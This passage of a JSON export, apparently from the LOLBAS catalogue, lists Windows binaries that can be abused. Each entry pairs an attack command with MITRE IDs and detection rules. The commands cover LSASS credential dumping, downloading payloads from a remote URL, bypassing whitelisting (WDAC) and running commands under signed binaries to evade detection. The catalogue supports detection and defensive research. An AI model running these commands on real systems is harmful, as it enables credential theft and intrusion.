Copy attempts to read or modify ntds.dit"}],"references":["https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358","https://www.netwrix.com/ntds_dit_security_active_directory.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dsdbutil/"]},{"id":"lolbas:dtutil-exe:0","toolId":"lolbas:dtutil-exe","toolName":"dtutil.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"dtutil.exe /FILE {PATH_ABSOLUTE:.source.ext} /COPY FILE;{PATH_ABSOLUTE:.dest.ext}","description":"Copy file from source to destination","usecase":"Use to copies the source file to the destination file","mitre":["T1105"],"privilege":"admin","fullPath":["C:\\Program Files\\Microsoft SQL Server\\<version>\\DTS\\Binn\\dtutil.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\<version>\\DTS\\Binn\\dtutil.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/sql/integration-services/dtutil-utility?view=sql-server-ver16","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dtutil/"]},{"id":"lolbas:dump64-exe:0","toolId":"lolbas:dump64-exe","toolName":"Dump64.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"dump64.exe {PID} out.dmp","description":"Creates a memory dump of the LSASS process.","usecase":"Create memory dump and parse it offline to retrieve credentials.","mitre":["T1003.001"],"privilege":"admin","fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\Installer\\Feedback\\dump64.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dump64.yml"},{"type":"IOC","value":"As a Windows SDK binary, execution on a system may be suspicious"}],"references":["https://twitter.com/mrd0x/status/1460597833917251595","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dump64/"]},{"id":"lolbas:dumpminitool-exe:0","toolId":"lolbas:dumpminitool-exe","toolName":"DumpMinitool.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"DumpMinitool.exe --file {PATH_ABSOLUTE} --processId 1132 --dumpType Full","description":"Creates a memory dump of the lsass process","usecase":"Create memory dump and parse it offline","mitre":["T1003.001"],"privilege":"admin","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\Extensions\\TestPlatform\\Extensions\\DumpMinitool.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_dumpminitool_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_dumpminitool_susp_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_devinit_lolbin_usage.yml"}],"references":["https://twitter.com/mrd0x/status/1511415432888131586","https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/"]},{"id":"lolbas:dxcap-exe:0","toolId":"lolbas:dxcap-exe","toolName":"Dxcap.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Dxcap.exe -c {PATH_ABSOLUTE:.exe}","description":"Launch specified executable as a subprocess of dxcap.exe. Note that you should have write permissions in the current working directory for the command to succeed; alternatively, add '-file c:\\path\\to\\writable\\location.ext' as first argument.","usecase":"Local execution of a process as a subprocess of dxcap.exe","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\System32\\dxcap.exe","C:\\Windows\\SysWOW64\\dxcap.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml"},{"type":"IOC","value":"dxcap.exe executing from outside of System32/SysWOW64"},{"type":"IOC","value":"dxcap.exe spawning Xperf.exe"},{"type":"IOC","value":"Xperf.exe executing from unusual directories (if not running from ADK path)"}],"references":["https://twitter.com/harr0ey/status/992008180904419328","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/"]},{"id":"lolbas:dxcap-exe:1","toolId":"lolbas:dxcap-exe","toolName":"Dxcap.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"dxcap.exe -usage","description":"Once executed, `dxcap.exe` will execute `xperf.exe` in the same folder. Thus, if `dxcap.exe` is copied to a folder and an arbitrary executable is renamed to `xperf.exe`, `dxcap.exe` will spawn it.","usecase":"Execute an arbitrary executable via trusted system executable.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\System32\\dxcap.exe","C:\\Windows\\SysWOW64\\dxcap.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml"},{"type":"IOC","value":"dxcap.exe executing from outside of System32/SysWOW64"},{"type":"IOC","value":"dxcap.exe spawning Xperf.exe"},{"type":"IOC","value":"Xperf.exe executing from unusual directories (if not running from ADK path)"}],"references":["https://twitter.com/harr0ey/status/992008180904419328","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/"]},{"id":"lolbas:ecmangen-exe:0","toolId":"lolbas:ecmangen-exe","toolName":"ECMangen.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"ECMangen.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\<version>\\Bin\\ECMangen.exe","C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\<version>\\Bin\\x64\\ECMangen.exe","C:\\Program Files\\Microsoft\\Exchange Server\\<version>\\Bin\\ECMangen.exe","C:\\Program Files\\Microsoft\\Exchange Server\\Bin\\ECMangen.exe","C:\\Program Files\\Microsoft\\Exchange Server\\ClientAccess\\Bin\\ECMangen.exe","C:\\ExchangeServer\\Bin\\ECMangen.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"URL on a ECMangen command line"},{"type":"IOC","value":"ECMangen making unexpected network connections or DNS requests"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/ECMangen/"]},{"id":"lolbas:excel-exe:0","toolId":"lolbas:excel-exe","toolName":"Excel.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"Excel.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Excel.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office16\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Excel.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office15\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Excel.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office14\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office12\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office12\\Excel.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_office.yml"},{"type":"IOC","value":"Suspicious Office application Internet/network traffic"}],"references":["https://twitter.com/reegun21/status/1150032506504151040","https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/"]},{"id":"lolbas:fsi-exe:0","toolId":"lolbas:fsi-exe","toolName":"Fsi.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"fsi.exe {PATH:.fsscript}","description":"Execute F# code via script file","usecase":"Execute payload with Microsoft signed binary to bypass WDAC policies","mitre":["T1059"],"privilege":"user","fullPath":["C:\\Program Files\\dotnet\\sdk\\<version>\\FSharp\\fsi.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsi.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Fsi.exe execution may be suspicious on non-developer machines"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml"}],"references":["https://twitter.com/NickTyrer/status/904273264385589248","https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/"]},{"id":"lolbas:fsi-exe:1","toolId":"lolbas:fsi-exe","toolName":"Fsi.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"fsi.exe","description":"Execute F# code via interactive command line","usecase":"Execute payload with Microsoft signed binary to bypass WDAC policies","mitre":["T1059"],"privilege":"user","fullPath":["C:\\Program Files\\dotnet\\sdk\\<version>\\FSharp\\fsi.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsi.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Fsi.exe execution may be suspicious on non-developer machines"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml"}],"references":["https://twitter.com/NickTyrer/status/904273264385589248","https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/"]},{"id":"lolbas:fsianycpu-exe:0","toolId":"lolbas:fsianycpu-exe","toolName":"FsiAnyCpu.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"fsianycpu.exe {PATH:.fsscript}","description":"Execute F# code via script file","usecase":"Execute payload with Microsoft signed binary to bypass WDAC policies","mitre":["T1059"],"privilege":"user","fullPath":["c:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsianycpu.exe"],"toolType":"OtherMSBinary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"FsiAnyCpu.exe execution may be suspicious on non-developer machines"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml"}],"references":["https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/"]},{"id":"lolbas:fsianycpu-exe:1","toolId":"lolbas:fsianycpu-exe","toolName":"FsiAnyCpu.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"fsianycpu.exe","description":"Execute F# code via interactive command line","usecase":"Execute payload with Microsoft signed binary to bypass WDAC policies","mitre":["T1059"],"privilege":"user","fullPath":["c:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsianycpu.exe"],"toolType":"OtherMSBinary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"FsiAnyCpu.exe execution may be suspicious on non-developer machines"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml"}],"references":["https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/"]},{"id":"lolbas:intellitrace-exe:0","toolId":"lolbas:intellitrace-exe","toolName":"IntelliTrace.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"IntelliTrace.exe launch /cp:\"collectionplan.xml\" /f:\"c:\\users\\public\\log\" \"C:\\Windows\\System32\\calc.exe\"","description":"Launches an executable via Visual Studio command line utility.","usecase":"Executes an executable under a trusted microsoft signed binary.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\IntelliTrace\\IntelliTrace.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\IntelliTrace\\IntelliTrace.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/visualstudio/debugger/intellitrace","https://lolbas-project.github.io/lolbas/OtherMSBinaries/IntelliTrace/"]},{"id":"lolbas:logger-exe:0","toolId":"lolbas:logger-exe","toolName":"Logger.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"logger.exe RUN \"{CMD}\"","description":"Executes the command specified after the `RUN` parameter as a child of `logger.exe`.","usecase":"Executes an abitrary command via a signed binary to evade detection.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x64\\logger.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/logger","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Logger/"]},{"id":"lolbas:logger-exe:1","toolId":"lolbas:logger-exe","toolName":"Logger.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"logger.exe RUNW \"{CMD}\"","description":"Executes the command specified after the `RUNW` parameter as a child of `logger.exe`.","usecase":"Executes an abitrary command via a signed binary to evade detection.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x64\\logger.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/logger","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Logger/"]},{"id":"lolbas:logger-exe:2","toolId":"lolbas:logger-exe","toolName":"Logger.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"logger.exe \"{CMD}\"","description":"Executes the command specified as a child of `logger.exe`.","usecase":"Executes an abitrary command via a signed binary to evade detection.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x64\\logger.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/logger","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Logger/"]},{"id":"lolbas:mftrace-exe:0","toolId":"lolbas:mftrace-exe","toolName":"Mftrace.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Mftrace.exe {PATH:.exe}","description":"Launch specified executable as a subprocess of Mftrace.exe.","usecase":"Local execution of cmd.exe as a subprocess of Mftrace.exe.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.16299.0\\x86\\mftrace.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.16299.0\\x64\\mftrace.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\x86\\mftrace.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\x64\\mftrace.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml"}],"references":["https://twitter.com/0rbz_/status/988911181422186496","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/"]},{"id":"lolbas:microsoft-nodejstools-pressanykey-exe:0","toolId":"lolbas:microsoft-nodejstools-pressanykey-exe","toolName":"Microsoft.NodejsTools.PressAnyKey.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Microsoft.NodejsTools.PressAnyKey.exe normal 1 {PATH:.exe}","description":"Launch specified executable as a subprocess of Microsoft.NodejsTools.PressAnyKey.exe.","usecase":"Spawn a new process via Microsoft.NodejsTools.PressAnyKey.exe.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\Extensions\\Microsoft\\NodeJsTools\\NodeJsTools\\Microsoft.NodejsTools.PressAnyKey.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\Extensions\\Microsoft\\NodeJsTools\\NodeJsTools\\Microsoft.NodejsTools.PressAnyKey.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_renamed_pressanykey.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml"}],"references":["https://twitter.com/mrd0x/status/1463526834918854661","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey/"]},{"id":"lolbas:mpiexec-exe:0","toolId":"lolbas:mpiexec-exe","toolName":"Mpiexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mpiexec.exe {CMD}","description":"Executes a command via MPI command-line tool.","usecase":"Executes commands under a trusted, Microsoft signed binary.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft MPI\\Bin\\mpiexec.exe","C:\\Program Files (x86)\\Microsoft MPI\\Bin\\mpiexec.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/powershell/high-performance-computing/mpiexec","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mpiexec/"]},{"id":"lolbas:msaccess-exe:0","toolId":"lolbas:msaccess-exe","toolName":"MSAccess.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"MSAccess.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload (if it has the filename extension .mdb) and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSAccess.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office16\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSAccess.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office15\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSAccess.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office14\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office12\\MSAccess.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"URL on a MSAccess command line"},{"type":"IOC","value":"MSAccess making unexpected network connections or DNS requests"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/MSAccess/"]},{"id":"lolbas:mscopilot-exe:0","toolId":"lolbas:mscopilot-exe","toolName":"Mscopilot.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mscopilot.exe --no-startup-window --disable-gpu-sandbox --gpu-launcher=\"{CMD} && taskkill /f /im mscopilot.exe &&\"","description":"`mscopilot.exe` will spawn the provided command. Parent `mscopilot.exe` process needs to be killed to avoid command being executed an infinite number of times.","usecase":"Executes a process under a trusted Microsoft signed binary","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\Copilot\\Application\\mscopilot.exe"],"toolType":"OtherMSBinary","references":["https://github.com/4n4s4zi/tour-de-mscopilot","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mscopilot/"]},{"id":"lolbas:mscopilot-proxy-exe:0","toolId":"lolbas:mscopilot-proxy-exe","toolName":"Mscopilot_proxy.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mscopilot_proxy.exe --no-startup-window --disable-gpu-sandbox --gpu-launcher=\"cmd.exe /c calc.exe && taskkill /f /im mscopilot.exe &&\"","description":"`mscopilot_proxy.exe` will spawn the provided command. Parent `mscopilot_proxy.exe` process needs to be killed to avoid command being executed an infinite number of times.","usecase":"Executes a process under a trusted Microsoft signed binary","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\Copilot\\Application\\mscopilot_proxy.exe"],"toolType":"OtherMSBinary","references":["https://github.com/4n4s4zi/tour-de-mscopilot","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mscopilot_proxy/"]},{"id":"lolbas:msdeploy-exe:0","toolId":"lolbas:msdeploy-exe","toolName":"Msdeploy.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand=\"{PATH_ABSOLUTE:.bat}\"","description":"Launch .bat file via msdeploy.exe.","usecase":"Local execution of batch file using msdeploy.exe.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml"}],"references":["https://twitter.com/pabraeken/status/995837734379032576","https://twitter.com/pabraeken/status/999090532839313408","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/"]},{"id":"lolbas:msdeploy-exe:1","toolId":"lolbas:msdeploy-exe","toolName":"Msdeploy.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand=\"{PATH_ABSOLUTE:.bat}\"","description":"Launch .bat file via msdeploy.exe.","usecase":"Local execution of batch file using msdeploy.exe.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml"}],"references":["https://twitter.com/pabraeken/status/995837734379032576","https://twitter.com/pabraeken/status/999090532839313408","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/"]},{"id":"lolbas:msdeploy-exe:2","toolId":"lolbas:msdeploy-exe","toolName":"Msdeploy.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"msdeploy.exe -verb:sync -source:filePath={PATH_ABSOLUTE:.source.ext} -dest:filePath={PATH_ABSOLUTE:.dest.ext}","description":"Copy file from source to destination.","usecase":"Copy file.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml"}],"references":["https://twitter.com/pabraeken/status/995837734379032576","https://twitter.com/pabraeken/status/999090532839313408","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/"]},{"id":"lolbas:msohtmed-exe:0","toolId":"lolbas:msohtmed-exe","toolName":"MsoHtmEd.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File 